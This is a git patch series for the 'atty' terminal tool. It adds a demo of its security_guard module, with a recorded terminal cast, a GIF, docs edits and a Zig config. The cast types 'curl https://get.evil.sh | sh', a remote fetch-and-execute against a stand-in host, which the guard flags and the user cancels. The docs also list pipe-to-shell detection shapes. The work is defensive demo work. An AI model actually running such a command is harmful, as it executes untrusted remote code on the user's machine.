From 901e7ddf5141eea75ef017cf3d9ff493d3af50ca Mon Sep 17 00:00:00 2001 From: Jan Guth Date: Tue, 30 Jun 2026 19:54:15 +0200 Subject: [PATCH 1/2] feat(demo): security_guard subset GIF + atuin docs reference the ghost demo MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - tests/demo/security_guard/ — the in-proc Tier-1 classifier catches a `curl … | sh` remote-fetch-and-execute and arms the [y]/[a]/[t]/[B] banner before it runs, with NO atty-guard daemon (empty daemon_socket_path → the bundled pattern set runs in-process). docs/assets/atty-security-guard.gif on the module page. Frame-verified; footer visible; OSC 7 stripped. - docs/modules/atuin.md: embed the shipped ghost GIF with a note that atuin's ghost-text UX is identical (same suggestions from the Atuin DB) — a dedicated atuin recording needs a seeded database, tracked as a follow-up. Co-Authored-By: Claude Opus 4.8 --- docs/assets/atty-security-guard.gif | Bin 0 -> 11081 bytes docs/modules/atuin.md | 4 ++ docs/modules/security_guard.md | 2 + tests/demo/security_guard/config.zig | 13 ++++ tests/demo/security_guard/golden/cast.json | 70 +++++++++++++++++++++ tests/demo/security_guard/golden/env.toml | 24 +++++++ tests/demo/security_guard/scenario.e2e | 20 ++++++ 7 files changed, 133 insertions(+) create mode 100644 docs/assets/atty-security-guard.gif create mode 100644 tests/demo/security_guard/config.zig create mode 100644 tests/demo/security_guard/golden/cast.json create mode 100644 tests/demo/security_guard/golden/env.toml create mode 100644 tests/demo/security_guard/scenario.e2e diff --git a/docs/assets/atty-security-guard.gif b/docs/assets/atty-security-guard.gif new file mode 100644 index 0000000000000000000000000000000000000000..7a11066f8c57274024099f3a86b4a43651d54d9e GIT binary patch literal 11081 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 literal 0 HcmV?d00001 diff --git a/docs/modules/atuin.md b/docs/modules/atuin.md index 1542810e..d2ad9c57 100644 --- a/docs/modules/atuin.md +++ b/docs/modules/atuin.md @@ -12,6 +12,10 @@ module_default: false Fish/zsh-autosuggestion-style ghost text driven by your [Atuin](https://github.com/atuinsh/atuin) history. +![atty ghost-text — a dim suggestion completes the line; Right accepts it]({{ '/assets/atty-ghost.gif' | relative_url }}) + +> The GIF above is the [`history`]({{ '/modules/history/' | relative_url }}) module (shell-native), shown because the ghost-text UX is identical — `atuin` sources the same suggestions from your Atuin database instead. A dedicated atuin recording needs a seeded DB; tracked as a follow-up. + * TOC {:toc} diff --git a/docs/modules/security_guard.md b/docs/modules/security_guard.md index fde05fed..1eb9ab16 100644 --- a/docs/modules/security_guard.md +++ b/docs/modules/security_guard.md @@ -7,6 +7,8 @@ permalink: /modules/security_guard/ # `security_guard` module +![atty security_guard: the in-proc Tier-1 classifier flags a `curl … | sh` remote-fetch-and-execute and arms a [y]/[a]/[t]/[B] banner before it runs — no daemon required]({{ '/assets/atty-security-guard.gif' | relative_url }}) + A second module in the guardrail family. Where [`guardrail`]({{ '/modules/' | relative_url }}#minimal-example--upper) matches a comptime list of patterns with a fixed `confirm`/`block`/`warn` behaviour, `security_guard` aims at supply-chain / drive-by-install shapes (`curl … | sh`, `npm install `, `bash -c ""`) and is engineered for opt-in plus a tightening V2 path: | Layer | What runs | diff --git a/tests/demo/security_guard/config.zig b/tests/demo/security_guard/config.zig new file mode 100644 index 00000000..c318ff38 --- /dev/null +++ b/tests/demo/security_guard/config.zig @@ -0,0 +1,13 @@ +//! atty_demo:security_guard — the in-proc Tier-1 classifier flags a dangerous +//! command before it runs, with NO atty-guard daemon (daemon_socket_path empty +//! → the bundled pattern set runs in-process). NOT a regression test. +const atty = @import("atty"); + +pub const modules = .{ + atty.modules.security_guard.configure(.{ .enabled = true }), +}; + +pub const statusbar: atty.StatusBar = .{ + .enabled = true, + .base_text = "atty", +}; diff --git a/tests/demo/security_guard/golden/cast.json b/tests/demo/security_guard/golden/cast.json new file mode 100644 index 00000000..170855e1 --- /dev/null +++ b/tests/demo/security_guard/golden/cast.json @@ -0,0 +1,70 @@ +{"version":2,"width":100,"height":14,"timestamp":0,"env":{"TERM":"xterm-256color","SHELL":"/bin/sh"}} +[0.000000, "o", "\u001b[>1u\u001b[2J\u001b[12;1H\u001b[K\u001b[13;1H\u001b[K\u001b[14;1H\u001b[K\u001b[1;11r\u001b[1;1H"] +[0.002000, "o", "\u001b[?2004h"] +[0.002000, "o", "\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b[12;1H\u001b[K\u001b8$ \u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[0.802000, "i", "c"] +[0.802000, "o", "c\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[0.860000, "i", "u"] +[0.860000, "o", "u\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[0.910000, "i", "r"] +[0.910000, "o", "r\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[0.990000, "i", "l"] +[0.990000, "o", "l\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[1.051000, "i", " "] +[1.051000, "o", " \u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[1.167000, "i", "h"] +[1.167000, "o", "h\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[1.218000, "i", "t"] +[1.218000, "o", "t\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[1.290000, "i", "t"] +[1.290000, "o", "t\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[1.366000, "i", "p"] +[1.366000, "o", "p\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[1.436000, "i", "s"] +[1.436000, "o", "s\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[1.481000, "i", ":"] +[1.482000, "o", ":\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[1.625000, "i", "/"] +[1.625000, "o", "/\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[1.743000, "i", "/"] +[1.743000, "o", "/\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[1.880000, "i", "g"] +[1.880000, "o", "g\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[1.938000, "i", "e"] +[1.938000, "o", "e\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[1.988000, "i", "t"] +[1.988000, "o", "t\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[2.029000, "i", "."] +[2.029000, "o", ".\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[2.170000, "i", "e"] +[2.170000, "o", "e\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[2.237000, "i", "v"] +[2.238000, "o", "v\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[2.277000, "i", "i"] +[2.277000, "o", "i\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[2.337000, "i", "l"] +[2.337000, "o", "l\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[2.393000, "i", "."] +[2.393000, "o", ".\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[2.516000, "i", "s"] +[2.517000, "o", "s\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[2.574000, "i", "h"] +[2.574000, "o", "h\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[2.645000, "i", " "] +[2.645000, "o", " \u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[2.786000, "i", "|"] +[2.786000, "o", "|\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[2.858000, "i", " "] +[2.858000, "o", " \u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[2.970000, "i", "s"] +[2.970000, "o", "s\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[3.021000, "i", "h"] +[3.021000, "o", "h\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[3.577000, "i", "\r"] +[3.577000, "o", "\r\n\u001b[2m\u001b[3matty security_guard: remote-fetch-and-execute (`curl … | sh`)\u001b[0m\r\n match: curl https://get.evil.sh | sh\r\n [y]es once · [a]llow always · [t]rust permanently · [B]lock host forever · any other key cancels.\r\n"] +[5.777000, "i", "\u0003"] +[5.777000, "o", "\r\u001b[C\u001b[C\u001b[K\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[7.128000, "i", "exit\r"] +[7.128000, "o", "exit\r\n\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8\u001b[?2004l\r\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[7.128000, "o", "exit\r\n\u001b7\u001b[14;1H\u001b[K\u001b[2matty\u001b[0m\u001b8"] +[7.129000, "o", "\u001b[12;1H\u001b[K\u001b[13;1H\u001b[K\u001b[14;1H\u001b[K\u001b[r\u001b[ Date: Tue, 30 Jun 2026 19:58:41 +0200 Subject: [PATCH 2/2] chore(demo): explicit daemon_socket_path + link atuin follow-up (review) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - security_guard config: set daemon_socket_path = "" explicitly (Copilot) so the in-proc Tier-1 intent is clear + robust to a default change. Same value as the default → behaviour + recorded cast unchanged. - atuin.md: link the deferred-atuin-recording follow-up (#546). Co-Authored-By: Claude Opus 4.8 --- docs/modules/atuin.md | 2 +- tests/demo/security_guard/config.zig | 7 ++++++- 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/docs/modules/atuin.md b/docs/modules/atuin.md index d2ad9c57..6c96ef56 100644 --- a/docs/modules/atuin.md +++ b/docs/modules/atuin.md @@ -14,7 +14,7 @@ Fish/zsh-autosuggestion-style ghost text driven by your [Atuin](https://github.c ![atty ghost-text — a dim suggestion completes the line; Right accepts it]({{ '/assets/atty-ghost.gif' | relative_url }}) -> The GIF above is the [`history`]({{ '/modules/history/' | relative_url }}) module (shell-native), shown because the ghost-text UX is identical — `atuin` sources the same suggestions from your Atuin database instead. A dedicated atuin recording needs a seeded DB; tracked as a follow-up. +> The GIF above is the [`history`]({{ '/modules/history/' | relative_url }}) module (shell-native), shown because the ghost-text UX is identical — `atuin` sources the same suggestions from your Atuin database instead. A dedicated atuin recording needs a seeded DB; tracked in [#546](https://github.com/fentas/atty/issues/546). * TOC {:toc} diff --git a/tests/demo/security_guard/config.zig b/tests/demo/security_guard/config.zig index c318ff38..a4c19e23 100644 --- a/tests/demo/security_guard/config.zig +++ b/tests/demo/security_guard/config.zig @@ -4,7 +4,12 @@ const atty = @import("atty"); pub const modules = .{ - atty.modules.security_guard.configure(.{ .enabled = true }), + atty.modules.security_guard.configure(.{ + .enabled = true, + // No sidecar in the demo: empty path keeps Tier-1 in-process (explicit + // so the demo is robust if the default ever changes). + .daemon_socket_path = "", + }), }; pub const statusbar: atty.StatusBar = .{